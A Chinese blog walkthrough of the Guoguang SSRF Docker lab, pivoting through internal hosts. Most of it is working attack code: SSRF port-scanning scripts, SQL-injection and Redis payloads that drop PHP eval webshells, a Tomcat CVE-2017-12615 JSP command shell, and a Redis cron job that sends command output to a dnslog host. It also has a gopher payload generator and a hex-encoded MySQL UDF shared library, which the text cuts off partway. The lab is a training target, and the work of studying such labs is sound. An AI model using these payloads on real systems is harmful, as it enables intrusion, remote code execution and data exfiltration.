国光SSRF靶场打穿内网
# 前言
很久前在b站up橙子科技看到过这个靶场,看到baozongwi (opens new window)师傅博客更新了wp,太棒了,跟着复现一遍
拓扑
# 环境部署
docker-compose.yml
networks:
ssrf_v:
ipam:
config:
- subnet: 192.168.100.0/24 # 改为 192.168.100.0/24,避免冲突
gateway: 192.168.100.1
services:
ssrfweb1:
image: selectarget/ssrf_web:v1
ports:
- 8090:80
networks:
ssrf_v:
ipv4_address: 192.168.100.21
ssrfweb2:
image: selectarget/ssrf_codesec:v2
networks:
ssrf_v:
ipv4_address: 192.168.100.22
ssrfweb3:
image: selectarget/ssrf_sql:v3
networks:
ssrf_v:
ipv4_address: 192.168.100.23
ssrfweb4:
image: selectarget/ssrf_commandexec:v4
networks:
ssrf_v:
ipv4_address: 192.168.100.24
ssrfweb5:
image: selectarget/ssrf_xxe:v5
networks:
ssrf_v:
ipv4_address: 192.168.100.25
ssrfweb6:
image: selectarget/ssrf_tomcat:v6
networks:
ssrf_v:
ipv4_address: 192.168.100.26
ssrfweb7:
image: selectarget/ssrf_redisunauth:v7
networks:
ssrf_v:
ipv4_address: 192.168.100.27
ssrfweb8:
image: selectarget/ssrf_redisauth:v8
networks:
ssrf_v:
ipv4_address: 192.168.100.28
ssrfweb9:
image: selectarget/ssrf_mysql:v9
networks:
ssrf_v:
ipv4_address: 192.168.100.29
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
启动:
docker compose up -d
1
# 入口点 http://192.168.245.140:8090/
ssrf文件读取
url=file:///etc/passwd
存在ssrf漏洞,file协议查看index.php源代码
获取当前主机ip信息192.168.100.21,收集网络信息
file:///etc/hosts 的快照如下:
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00:: ip6-localnet
ff00:: ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.100.21 7e68593461ed
1
2
3
4
5
6
7
2
3
4
5
6
7
使用dict协议扫描内网存活主机
import requests
import time
url="http://192.168.245.140:8090/"
for i in range(1,255):
ip="192.168.100."+str(i)
try:
r=requests.post(url,data={"url":f"dict://{ip}/"},timeout=1.5)
print(ip+"存活")
except requests.exceptions.Timeout:
pass
time.sleep(0.3)
print("[*]:扫描结束")
1
2
3
4
5
6
7
8
9
10
11
12
13
2
3
4
5
6
7
8
9
10
11
12
13
存活主机列表
192.168.100.1存活
192.168.100.21存活
192.168.100.22存活
192.168.100.23存活
192.168.100.24存活
192.168.100.26存活
192.168.100.27存活
192.168.100.28存活
192.168.100.29存活
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
通过dict协议扫描目标端口返回特征指纹,信息不同,可以判断服务是否存活
import requests
import time
ips = [
"192.168.100.21",
"192.168.100.22",
"192.168.100.23",
"192.168.100.24",
"192.168.100.25",
"192.168.100.26",
"192.168.100.27",
"192.168.100.28",
"192.168.100.29",
]
url = "http://192.168.245.140:8090/"
ports = [80, 8080, 443, 6379, 3306] # 支持 Web、Redis 和 MySQL 端口
for ip in ips:
for port in ports:
target = f"{ip}:{port}"
payload = {
"url": "dict://" + target
}
try:
resp = requests.post(url, data=payload, timeout=3)
if "HTTP/1.1" in resp.text:
print(f"{target} - Web 服务")
elif "NOAUTH Authentication required" in resp.text:
print(f"{target} - Redis 服务(需密码认证)")
elif "+OK" in resp.text:
print(f"{target} - Redis 服务(未授权漏洞)")
elif "mysql_native_password" in resp.text:
print(f"{target} - MySQL 服务(需密码认证)")
except requests.exceptions.Timeout:
print(f"{target} - 请求超时") # 超时处理
except Exception as e:
print(f"{target} - 错误: {e}")
print("[*] - 扫描结束")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
探测信息
192.168.100.21:80 - Web 服务
192.168.100.22:80 - Web 服务
192.168.100.23:80 - Web 服务
192.168.100.24:80 - Web 服务
192.168.100.26:8080 - Web 服务
192.168.100.27:6379 - Redis 服务(未授权漏洞)
192.168.100.28:6379 - Redis 服务(需密码认证)
192.168.100.29:3306 - MySQL 服务(需密码认证)
[*] - 扫描结束
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
# 192.168.100.22:80 代码注入
存在shell.php,代码执行
url里的参数需要进行一次url编码,在ssrf时,确保可以正常解析
有命令执行,但是没有写的权限,tmp目录可以写
# 192.168.100.23:80 SQL注入
存在sql注入漏洞,写个shell进去,空格要用%20,整体的参数再进行一次url编码
# payload
?id=-1'union%20select%201,2,3,'<?=highlight_file(__FILE__);eval($_GET[1]);?>'%20into%20outfile%20'/var/www/html/1.php'%23
# url编码
%3Fid%3D-1'union%2520select%25201%2C2%2C3%2C'%3C%3F%3Dhighlight_file(__FILE__)%3Beval(%24_GET%5B1%5D)%3B%3F%3E'%2520into%2520outfile%2520'%2Fvar%2Fwww%2Fhtml%2F1.php'%2523
1
2
3
4
2
3
4
成功写入shell
# 192.168.100.24:80 命令执行
在192.168.100.24:80端口,一个ping命令测试,看起来是system('ping $_GET[ip]')
尝试get请求没有变化,看起来是post请求
在已经拿到shell的主机22,23上尝试使用curl命令发送post请求
22主机上没有curl命令,23主机上存在curl命令
使用23主机curl命令发送post请求
# payload
?1=system('curl%20"http://192.168.100.24/"%20-X%20POST%20-d%20"ip=127.0.0.1;ls"');
# url编码
%3F1%3Dsystem('curl%2520%22http%3A%2F%2F192.168.100.24%2F%22%2520-X%2520POST%2520-d%2520%22ip%3D127.0.0.1%3Bls%22')%3B
1
2
3
4
2
3
4
成功RCE
# payload
?1=system('curl%20"http://192.168.100.24/"%20-X%20POST%20-d%20"ip=127.0.0.1;touch%201111;ls%20-lah"');
# url编码
1%3Dsystem('curl%2520%22http%3A%2F%2F192.168.100.24%2F%22%2520-X%2520POST%2520-d%2520%22ip%3D127.0.0.1%3Btouch%25201111%3Bls%2520-lah%22')%3B
1
2
3
4
2
3
4
还是没有写的权限,只能用题目提供的shell
# 192.168.100.25:80 XXE
我的25怎么死了
# 192.168.100.26:8080 Tomcat/8.5.19 CVE-2017-12615
tomcat 8.5.19 版本存在漏洞,使用23主机的curl命令发送put请求,测试能否写入文件
# payload
?1=system('curl%20-X%20PUT%20-H%20"Content-Type:%20application/x-www-form-urlencoded"%20-d%20"1111"%20http://192.168.100.26:8080/1.jsp/');
# url编码
%3F1%3Dsystem('curl%2520-X%2520PUT%2520-H%2520%22Content-Type%3A%2520application%2Fx-www-form-urlencoded%22%2520-d%2520%221111%22%2520http%3A%2F%2F192.168.100.26%3A8080%2F1.jsp%2F')%3B
1
2
3
4
2
3
4
写入成功
尝试写入webshell
在system函数里,使用反引号解码base64编码的webshell,避免webshell里的特殊字符导致解析失败
# payload
?1=system('a=`echo%20PCUKUHJvY2VzcyBwcm9jZXNzID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpOwpqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtID0gcHJvY2Vzcy5nZXRJbnB1dFN0cmVhbSgpOwpqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIGJ1ZmZlcmVkUmVhZGVyID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoaW5wdXRTdHJlYW0pKTsKU3RyaW5nIGxpbmU7CndoaWxlICgobGluZSA9IGJ1ZmZlcmVkUmVhZGVyLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgIHJlc3BvbnNlLmdldFdyaXRlcigpLnByaW50bG4obGluZSk7Cn0KJT4=|base64%20-d`;curl%20-X%20PUT%20-H%20"Content-Type:%20application/x-www-form-urlencoded"%20-d%20"$a"%20http://192.168.100.26:8080/2.jsp/');
# url编码
%3F1%3Dsystem('a%3D%60echo%2520PCUKUHJvY2VzcyBwcm9jZXNzID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpOwpqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtID0gcHJvY2Vzcy5nZXRJbnB1dFN0cmVhbSgpOwpqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyIGJ1ZmZlcmVkUmVhZGVyID0gbmV3IGphdmEuaW8uQnVmZmVyZWRSZWFkZXIobmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoaW5wdXRTdHJlYW0pKTsKU3RyaW5nIGxpbmU7CndoaWxlICgobGluZSA9IGJ1ZmZlcmVkUmVhZGVyLnJlYWRMaW5lKCkpICE9IG51bGwpIHsKICAgIHJlc3BvbnNlLmdldFdyaXRlcigpLnByaW50bG4obGluZSk7Cn0KJT4%3D%7Cbase64%2520-d%60%3Bcurl%2520-X%2520PUT%2520-H%2520%22Content-Type%3A%2520application%2Fx-www-form-urlencoded%22%2520-d%2520%22%24a%22%2520http%3A%2F%2F192.168.100.26%3A8080%2F2.jsp%2F')%3B
1
2
3
4
2
3
4
base64解码的webshell内容
<%
Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
java.io.InputStream inputStream = process.getInputStream();
java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(inputStream));
String line;
while ((line = bufferedReader.readLine()) != null) {
response.getWriter().println(line);
}
%>
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
还是一台root权限的主机哎
# 192.168.100.27:6379 Redis未授权
dict协议除了可以探测主机存活,还可以攻击未授权redis服务
dict协议探测redis,返回了+OK,说明直接连接成功
redis玩法很多
- 写入webshell
- 写入ssh密钥
- 定时任务
这台主机在内网,如果不考虑搭建内网代理流量,写入ssh密钥、定时任务反弹shell似乎也都用不到?
试试写定时任务,使用curl,把命令执行结果带出来,好想法
下面payload使用过程需要url编码,避免写入格式错误
# 清空 key
dict://192.168.100.27:6379/flushall
# 设置要操作的路径为定时任务目录
dict://192.168.100.27:6379/config set dir /var/spool/cron/
# 在定时任务目录下创建 root 的定时任务文件
dict://192.168.100.27:6379/config set dbfilename root
# dnslog带出命令执行结果
dict://192.168.100.27:6379/set x "\n* * * * * /usr/bin/curl `whoami`.snv1xj.dnslog.cn\n"
# 保存上述操作
dict://192.168.100.27:6379/save
1
2
3
4
5
6
7
8
9
10
11
12
13
14
2
3
4
5
6
7
8
9
10
11
12
13
14
# 192.168.100.28:6379 Redis密码认证
在28主机80端口存在web服务
在dict协议探测过程,28主机的web服务探测超时,使用http协议探测,可以访问到web服务
首页,存在一个php 文件包含漏洞,同时存在一个有密码认证的redis服务
php文件包含漏洞
包含/etc/passwd,可以知道web服务是apache
猜测apache配置文件目录/etc/httpd/conf/httpd.conf
配置文件里拿到关键信息,web根目录,apache根目录,日志相对路径
DocumentRoot "/var/www/html"
ServerRoot "/etc/httpd"
CustomLog "logs/access_log" combined
1
2
3
2
3
/etc/httpd/logs在 CentOS/RHEL 系统中,这个目录通常是一个 软链接,指向真实的日志路径:/var/log/httpd
那么实际日志目录就是/var/log/httpd/access_log,尝试文件包含,失败
这个日志文件不存在,apache用户没有权限在这里写日志
在容器里验证
sh-4.2# ls /var/log/httpd/ -lah
total 8.0K
drwx------ 2 root root 4.0K Nov 16 2020 .
drwxr-xr-x 1 root root 4.0K May 29 2024 ..
1
2
3
4
2
3
4
那这个文件包含就只能当作文件读取了,尝试读取redis配置文件里的密码
redis常见配置文件目录
| 路径 | 说明 |
|---|---|
/etc/redis/redis.conf | 最常见的默认路径(Debian/Ubuntu) |
/etc/redis.conf | 有些系统直接放在 /etc 下面(比如 CentOS) |
/usr/local/etc/redis.conf | 源码安装时的默认路径 |
/opt/redis/redis.conf | 有些定制服务手动安装时会放这里 |
测试发现,主机28redis配置文件在/etc/redis.conf,找到密码P@ssw0rd
通过定时任务写入webshell
auth P@ssw0rd
flushall
config set dir /var/www/html/
config set dbfilename 1.php
set x "<?=highlight_file(__FILE__);eval(\$_GET[1]);?>"
save
quit
1
2
3
4
5
6
7
2
3
4
5
6
7
dict协议一次只能执行一条redis命令,无密码的redis还好,一句一句执行,用来认证,就不能执行后续命令了。这里有密码,使用gopher协议,一次打爽
格式
gopher://127.0.0.1:6379/_payload
payload是构造好的 Redis 多个(十六进制或 URL 编码格式)
redis协议格式
*参数个数\r\n
$参数1长度\r\n
参数1内容\r\n
$参数2长度\r\n
参数2内容\r\n
...
1
2
3
4
5
6
2
3
4
5
6
举个例子:set x 123就可以表示为:
*3\r\n
$3\r\n
set\r\n
$1\r\n
x\r\n
$3\r\n
123\r\n
1
2
3
4
5
6
7
2
3
4
5
6
7
把这条命令写成一个gopher协议
auth P@ssw0rd
flushall
config set dir /var/www/html/
config set dbfilename 1.php
set x "<?=highlight_file(__FILE__);eval($_GET[1]);?>"
save
1
2
3
4
5
6
2
3
4
5
6
python脚本生成gopher协议payload
from urllib.parse import *
def redis_payload(cmds):
payload = ""
for cmd in cmds:
parts = cmd.strip().split(" ")
payload += "*%d\r\n" % len(parts)
for p in parts:
payload += "$%d\r\n%s\r\n" % (len(p), p)
return quote(payload)
# Redis命令集:写 WebShell 的流程
cmds = [
"auth P@ssw0rd", # 如果无密码,可删除此行
"flushall",
"config set dir /var/www/html/",
"config set dbfilename 1.php",
"set x \"<?=highlight_file(__FILE__);eval($_GET['1']);?>\"",
"save"
]
ip = "192.168.100.28"
port = 6379
# 一次编码:处理空格 %20
payload = redis_payload(cmds)
# 二次编码payload 处理斜杠根
payload = quote_plus(payload)
url = f"gopher://{ip}:{port}/_{payload}"
print(url)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
- 使用 quote 编码 URL 路径部分,空格会被编码为 %20,不会编码斜杠。
- 使用 quote_plus 编码 URL 查询参数部分,空格会被编码为 +,可以编码斜杠。
互补一下,刚刚好
写入webshell
# 192.168.100.29:3306 有密码认证mysql
主机29上是一个mysql,dict协议探测,提示要密码,空密码也算密码吗?
mysql> SELECT user, host, authentication_string FROM mysql.user WHERE user='root';
+------+-----------+-----------------------+
| user | host | authentication_string |
+------+-----------+-----------------------+
| root | localhost | |
| root | % | |
+------+-----------+-----------------------+
2 rows in set (0.02 sec)
mysql> SELECT user, host, password FROM mysql.user;
+------+-----------+----------+
| user | host | password |
+------+-----------+----------+
| root | localhost | |
| root | % | |
+------+-----------+----------+
2 rows in set (0.00 sec)
mysql> SELECT user, host, authentication_string FROM mysql.user;
+------+-----------+-----------------------+
| user | host | authentication_string |
+------+-----------+-----------------------+
| root | localhost | |
| root | % | |
+------+-----------+-----------------------+
2 rows in set (0.00 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
想要打 MySQL 就需要知道 MySQL 通信时的 TCP 数据流,才能知道要怎么和 MySQL 通信,这里可以通过 大佬写的python脚本抓包来分析。项目地址https://github.com/FoolMitAh/mysql_gopher_attack (opens new window)
这个脚本可以指定用户名、密码,那么说还能爆破有密码的mysql了?
要抓取与主机29 mysql通信时的tcp流量,可能需要以下条件
- 可以通信 (内网主机)
- 存在python环境 (使用大佬python脚本抓包)
在刚刚拿下的有密码认证的redis上,刚好存在python环境
下载exp到主机28
# payload
url=http://192.168.100.28/1.php?1=system('curl -o exp.py https://raw.githubusercontent.com/FoolMitAh/mysql_gopher_attack/master/exploit.py;ls -lah');
# 空格二次编码
url=http://192.168.100.28/1.php?1=system('curl%2520-o%2520exp.py%2520https://raw.githubusercontent.com/FoolMitAh/mysql_gopher_attack/master/exploit.py;ls%2520-lah');
1
2
3
4
2
3
4
在主机28上运行脚本,指定主机29,成功执行sql语句
# payload
url=http://192.168.100.28/1.php?1=system('python exp.py -t 192.168.100.29 -u root -p "" -d "" -P "select now()" -v -c >1.txt;ls -lah;cat 1.txt');
# 空格二次编码
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"select%2520now()"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
3
4
2
3
4
尝试通过mysql udf提权RCE
查询mysql插件目录/usr/lib/mysql/plugin/
# payload
url=http://192.168.100.28/1.php?1=system('python exp.py -t 192.168.100.29 -u root -p "" -d "" -P "SHOW VARIABLES LIKE \"plugin_dir\";" -v -c >1.txt;ls -lah;cat 1.txt');
# 空格二次编码 %编码
url=http://192.168.100.28f/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"SHOW%2520VARIABLES%2520LIKE%2520\"plugin_dir\";"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
3
4
2
3
4
查询mysql版本、位数,64位mysql
# payload
url=http://192.168.100.28/1.php?1=system('python exp.py -t 192.168.100.29 -u root -p "" -d "" -P "show variables like \"%version%\";" -v -c >1.txt;ls -lah;cat 1.txt');
# 空格二次编码,%编码
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"show%2520variables%2520like%2520\"%25version%25\";"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
3
4
2
3
4
在国光提供的udf提权网页找到合适的payloadMySQL UDF 提权十六进制查询 | 国光 (opens new window)
尝试写入udf so文件,写入失败,提示目录没有权限
----------------------------------------------------------------------------------------------------
| sql: select 111 into dumpfile "/usr/lib/mysql/plugin/111111111"; |
----------------------------------------------------------------------------------------------------
Result: g�#HY000Can't create/write to file '/usr/lib/mysql/plugin/111111111' (Errcode: 13 - Permission denied)
----------------------------------------------------------------------------------------------------
sql: select 111 into dumpfile "/usr/lib/mysql/plugin/111111111"
1
2
3
4
5
6
2
3
4
5
6
sql查询,安全配置的mysql是否有权限,验证一下
# payload
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"show%2520variables%2520like%2520\"%2525secure_file_priv%2525\";"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
2
配置里是空,那么就是有写权限的
进docker看看,在docker容器的入口脚本里,给插件目录777权限了,可能没生效?再执行一次
再次尝试写文件,测试成功,可以写入文件了
写入恶意so文件
点击查看
# payload
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"SELECT%25200x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001